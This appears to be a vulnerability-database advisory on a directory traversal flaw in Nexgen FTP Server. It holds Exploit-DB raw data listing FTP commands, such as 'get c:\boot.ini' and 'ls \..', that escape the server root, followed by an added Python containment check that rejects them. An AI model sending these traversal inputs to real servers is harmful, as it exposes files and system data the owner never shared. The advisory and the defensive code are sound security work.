vendor: Nexgen FTP Server
by: Unknown
CVSS: 7.5 HIGH
Remote Directory Traversal
CWE: 22
Product Name: Nexgen FTP Server
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:nexgen:nexgen_ftp_server
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Nexgen FTP Server Remote Directory Traversal Vulnerability

The Nexgen FTP server is prone to a remote directory traversal vulnerability. This vulnerability allows authenticated users to bypass file request string sanitization and gain access to sensitive information on the server. An attacker can exploit this vulnerability to launch further attacks on the system.

Mitigation:

It is recommended to update the Nexgen FTP server to the latest version or apply any patches released by the vendor. Additionally, restrict access to the FTP server to trusted users only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9970/info

It has been reported that the Nexgen FTP server is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize file request strings from authenticated users.

Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system.

ls c:\*.*
ls ..
ls \..
ls /../
dir c:
dir \..\*.*
get c:\"Exist File" [ c:\boot.ini ]
get \..\"Exist File"
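
An added example, not code from the vendor or from the original advisory: a lexical containment check of the kind the description says was missing, applied to the arguments of the commands listed above. The root `C:\ftproot`, the `cwd` parameter and the names `resolve_in_root`, `verdicts` and `PathRejected` are assumptions made for illustration.

```python
import ntpath  # Windows path semantics, whatever OS this runs on

class PathRejected(Exception):
    """The client-supplied path would resolve outside the FTP root."""

def resolve_in_root(root, requested, cwd="\\"):
    """Return the absolute path for an FTP argument, or raise PathRejected."""
    root = ntpath.normcase(ntpath.normpath(root))
    # FTP clients quote names that contain spaces; drop the quotes first.
    requested = requested.replace('"', "")
    # A colon is a drive letter (c:\boot.ini, c:) or an NTFS stream name.
    if ":" in requested or "\x00" in requested:
        raise PathRejected("drive/stream specifier: %r" % requested)
    unified = requested.replace("/", "\\")
    if unified.startswith("\\\\"):
        raise PathRejected("UNC path: %r" % requested)
    # A leading separator means the virtual root, anything else is cwd-relative.
    virtual = unified if unified.startswith("\\") else ntpath.join(cwd, unified)
    candidate = ntpath.normcase(
        ntpath.normpath(ntpath.join(root, virtual.lstrip("\\"))))
    # Decide on the normalised result, not on the presence of ".." in the input.
    if ntpath.commonpath([root, candidate]) != root:
        raise PathRejected("escapes root: %r -> %s" % (requested, candidate))
    # Lexical check only: a real server must also resolve links and junctions.
    return candidate

def verdicts(root, requests):
    """Map each request string to the resolved path or the string 'REJECTED'."""
    out = {}
    for req in requests:
        try:
            out[req] = resolve_in_root(root, req)
        except PathRejected:
            out[req] = "REJECTED"
    return out

# Arguments of the commands listed in the advisory.
ADVISORY_ARGS = ["c:\\*.*", "..", "\\..", "/../", "c:", "\\..\\*.*",
                 'c:\\"Exist File"', "c:\\boot.ini", '\\..\\"Exist File"']
# Constructed examples of requests that should keep working.
LEGIT_ARGS = ["pub/readme.txt", "docs\\..\\pub\\file.txt", "*.*"]

if __name__ == "__main__":
    for arg, result in verdicts("C:\\ftproot", ADVISORY_ARGS + LEGIT_ARGS).items():
        print("%-22r %s" % (arg, result))
```

The second constructed request contains `..` yet stays inside the root, which is why the decision is made on the normalised path rather than by searching the input for dot-dot sequences.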